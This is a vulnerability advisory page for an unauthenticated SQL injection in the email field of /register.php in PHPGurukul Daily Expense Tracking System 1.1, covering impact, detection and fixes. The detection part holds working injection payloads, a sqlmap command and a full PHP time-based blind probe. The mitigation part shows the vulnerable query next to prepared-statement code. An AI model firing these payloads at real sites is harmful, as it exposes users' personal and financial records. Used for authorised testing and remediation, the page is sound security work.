CVE-2026-6193
Status: Received - Intake
SQL Injection in PHPGurukul Expense Tracker /register.php

Publication date: 2026-04-13

Last updated on: 2026-04-29

Assigner: VulDB

Description
A security flaw has been discovered in PHPGurukul Daily Expense Tracking System 1.1. Affected is an unknown function of the file /register.php. The manipulation of the argument email results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.
Meta Information
Published: 2026-04-13
Last Modified: 2026-04-29
Generated: 2026-06-16
AI Q&A: 2026-04-13
EPSS Evaluated: 2026-06-15
Affected Vendors & Products (1 associated CPE)
Vendor: phpgurukul
Product: daily_expense_tracking_system
Version / Range: 1.1
Weakness (CWE)
CWE-89 (SQL Injection): The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
CWE-74 (Injection, parent of CWE-89): The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
Compliance Impact

The SQL injection vulnerability in PHPGurukul Daily Expense Tracking System 1.1 allows attackers to gain unauthorized access to sensitive data, modify or delete records, and disrupt services. Such unauthorized access and potential data breaches can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require the protection of personal and sensitive information.

Failure to remediate this vulnerability may result in exposure of personal data, violating confidentiality and integrity requirements mandated by these standards, potentially leading to legal and financial consequences.

Therefore, addressing this vulnerability promptly is critical to maintaining compliance with common security and privacy regulations.

Executive Summary

CVE-2026-6193 affects the PHPGurukul Daily Expense Tracking System version 1.1, specifically the "/register.php" file. It is a SQL injection vulnerability caused by the "email" parameter of the POST request being used in a SQL query without proper validation or parameterization.

Because the parameter becomes part of the SQL text, an attacker can inject SQL syntax through it and read, modify or delete data in the application's database, or disrupt the service. How far an attacker can go beyond the database (for example, reading or writing files on the host) depends on the privileges of the account the application uses to connect to MySQL, not on the injection itself.

Exploitation requires no authentication or login and has been demonstrated using boolean-based blind and time-based blind SQL injection techniques.

Impact Analysis

This vulnerability can have severe impacts, including unauthorized access to the database, leakage of sensitive data (registered users' details and expense records), and modification or deletion of records. If the application connects with an over-privileged database account, the compromise can extend beyond the database to the host.

Attackers can disrupt the service and reach the database without any authentication, since /register.php is exposed to unauthenticated visitors by design.

Detection Guidance

The vulnerability can be detected by testing the /register.php endpoint for SQL injection via the email parameter in POST requests.

Tools like sqlmap can be used to automate detection and confirm the presence of SQL injection.

  • Use sqlmap against the registration form, restricting the test to the parameter named by the advisory (the email value is an arbitrary placeholder; include the form's other fields in --data if the page rejects requests without them): sqlmap -u "http://target/register.php" --data="email=test@example.com" -p email --risk=3 --level=5
  • Manually test by injecting SQL payloads in the email parameter, for example: test' OR '1'='1
  • Use boolean-based blind or time-based blind SQL injection techniques, such as injecting payloads with MySQL's SLEEP function and comparing the response time against a baseline request with a benign email value, so that a slow server is not mistaken for a delay caused by SLEEP.
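The time-based check in the list above, as an added example that is not part of this page, of sqlmap, or of the PHPGurukul project. It assumes a MySQL/MariaDB backend (SLEEP()), that the email value lands inside a single-quoted string in the vulnerable query, that the endpoint accepts a POST body with an "email" field, and that the base URL is passed as the first command-line argument; the exact statement in register.php is not known from the advisory, so a negative result does not rule the flaw out. Use it only against systems you are authorised to test.

```php
<?php
// Added example: time-based blind SQL injection probe for the "email"
// POST parameter of /register.php. Not code from the product or the page.
declare(strict_types=1);

const SLEEP_SECONDS = 5;               // delay we ask the database for
const PROBE_EMAIL   = 'probe@example.com';   // constructed benign value

// Send one POST request and return status, body and wall-clock time taken.
function post_form(string $url, array $fields): array
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => http_build_query($fields),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,
        CURLOPT_TIMEOUT        => SLEEP_SECONDS * 4,   // never hang forever
    ]);
    $start   = microtime(true);
    $body    = curl_exec($ch);
    $elapsed = microtime(true) - $start;
    $status  = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return ['status' => $status, 'body' => (string) $body, 'elapsed' => $elapsed];
}

// The payload only delays the response if the quote terminates the string
// in the query and SLEEP() is evaluated by the database. "-- -" comments
// out whatever follows the injected value (assumed single-quote context).
function time_based_probe(string $url, int $repeats = 2): bool
{
    $baseline = post_form($url, ['email' => PROBE_EMAIL])['elapsed'];
    $payload  = PROBE_EMAIL . "' AND SLEEP(" . SLEEP_SECONDS . ")-- -";

    // Require the delay on every repeat to exceed the baseline by most of
    // SLEEP_SECONDS: one fast response is enough to reject the hypothesis,
    // and a single slow response on a loaded server is not enough to accept it.
    for ($i = 0; $i < $repeats; $i++) {
        $r = post_form($url, ['email' => $payload]);
        if (($r['elapsed'] - $baseline) < SLEEP_SECONDS * 0.8) {
            return false;
        }
    }
    return true;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $url = rtrim($argv[1], '/') . '/register.php';
    echo 'time-based SQL injection via email on ', $url, ': ',
         time_based_probe($url) ? 'LIKELY' : 'not observed', PHP_EOL;
}
```

Run it as `php probe.php http://target`. If the registration form requires other fields (name, password, a submit button name), add them to the `$fields` array with harmless values, otherwise the script may return early before the injected value reaches the query and the probe reports "not observed" for the wrong reason.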
Mitigation Strategies

The primary fix is to stop building the query in /register.php from the raw "email" value: use a prepared statement with parameter binding, so the value is sent to the database as data and can never be parsed as SQL.

In addition, validate the email parameter on the server before it is used anywhere (reject values that are not syntactically valid addresses, and cap their length); this is defence in depth, not a substitute for parameterization.

Restrict the database account the application connects with to the minimum necessary privileges (SELECT/INSERT/UPDATE on the application's own database), and never use a high-privilege account such as 'root' or an administrative user for routine operations; this bounds what a successful injection can reach.

These steps are critical to protect system security and maintain data integrity.
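The three mitigations above side by side, as an added example that is not the project's own code: the concatenation pattern the advisory describes (shown only to contrast it), then the same lookup and insert with mysqli prepared statements, server-side email validation, and a least-privilege grant. The table and column names (tblusers, ID, Email, Password) and the account names are assumptions for illustration; PHPGurukul's real schema is not reproduced here.

```php
<?php
// Added example (not PHPGurukul code): vulnerable pattern vs hardened form.
declare(strict_types=1);

// --- Vulnerable pattern, do NOT use ----------------------------------------
// $email comes straight from $_POST, so a value like  x' OR '1'='1  rewrites
// the WHERE clause, and  x' AND SLEEP(5)-- -  makes the server stall.
function email_exists_vulnerable(mysqli $db, string $email): bool
{
    $result = $db->query("SELECT ID FROM tblusers WHERE Email='" . $email . "'");
    return $result !== false && $result->num_rows > 0;
}

// --- Hardened form ---------------------------------------------------------

// Input validation (defence in depth): accept only a syntactically valid
// address of sane length. FILTER_VALIDATE_EMAIL rejects quotes, spaces and
// the other characters an injection payload needs.
function normalise_email(string $raw): ?string
{
    $email = trim($raw);
    if (strlen($email) > 254 || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return strtolower($email);
}

// Parameter binding: the "?" placeholder is filled by the driver with the
// value as data, so SQL syntax inside $email has no effect on the statement.
function email_exists(mysqli $db, string $email): bool
{
    $stmt = $db->prepare('SELECT 1 FROM tblusers WHERE Email = ? LIMIT 1');
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->store_result();
    $exists = $stmt->num_rows > 0;
    $stmt->close();
    return $exists;
}

function register_user(mysqli $db, array $post): string
{
    $email = normalise_email($post['email'] ?? '');
    if ($email === null) {
        return 'Invalid email address';
    }
    if (email_exists($db, $email)) {
        return 'Email already registered';
    }
    // Password column and hashing are assumed for a realistic registration.
    $hash = password_hash($post['password'] ?? '', PASSWORD_DEFAULT);
    $stmt = $db->prepare('INSERT INTO tblusers (Email, Password) VALUES (?, ?)');
    $stmt->bind_param('ss', $email, $hash);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok ? 'Registered' : 'Registration failed';
}

// Least privilege, run once by a DBA (assumed names):
//   CREATE USER 'expense_app'@'localhost' IDENTIFIED BY '<strong password>';
//   GRANT SELECT, INSERT, UPDATE ON expensedb.* TO 'expense_app'@'localhost';
// The application then connects as that account, not as root:
//
// mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on SQL errors
// $db = new mysqli('127.0.0.1', 'expense_app', '<strong password>', 'expensedb');
// $db->set_charset('utf8mb4');
// echo register_user($db, $_POST);
```

Enabling `MYSQLI_REPORT_STRICT` matters here: without it a failed `prepare()` returns `false` and the next call fails with a less obvious error, which is how parameterized code sometimes gets "fixed" back into string concatenation.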
